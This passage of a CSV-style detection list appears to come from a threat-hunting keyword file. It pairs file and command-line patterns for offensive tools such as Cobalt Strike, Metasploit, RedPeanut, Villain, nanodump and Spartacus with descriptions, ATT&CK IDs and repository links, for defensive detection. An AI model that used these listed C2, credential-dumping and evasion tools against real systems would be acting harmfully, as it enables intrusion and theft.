comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" 
+"*source/avetsvc.c*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/shtinkering.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*Source\wdextract\*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\dll_x64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\dll_x86\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\lib\zlibwapi32.lib*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - 
T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\lib\zlibwapi64.lib*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*SourcePoint*Loader.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*source-teamserver.sh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and 
techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*spacerunner.exe -i *.ps1* -o *.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*SpaceRunner-master.zip*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" 
+"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*Spartacus.exe --mode proxy*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*Spartacus-main.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*spartacus-proxy-*.log*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*Spartacus-v2.*-x64.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*spartan-conseil/ratchatpt*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*spartan-conseil/ratchatpt*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*spawn/runshellcode*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*spawn_cmd.dll*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" +"*spawnas * \ HACKER 
https*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SpawnAsAgentManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*spawnasshellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnAsShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
+"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*SpawnPPIDAgentManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnShellcode.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnTheThing(*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*spawnto *.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*spawnto */path *","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*spawnto_x64 -Application *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*'spawnto_x64'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*spawnto_x64.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*spawnto_x86 -Application*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*'spawnto_x86'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*spawnto_x86.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*specialtokengroupprivs.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*Spel_RCE_Bash_EXP.py*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Spel_RCE_POC.py*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A",,"N/A",,,
+"*spiderfoot -l 127.0.0.1:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*spiderfoot-cli -s http*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*-SpiderFoot-correlations.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*spiderfoot-master*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A"
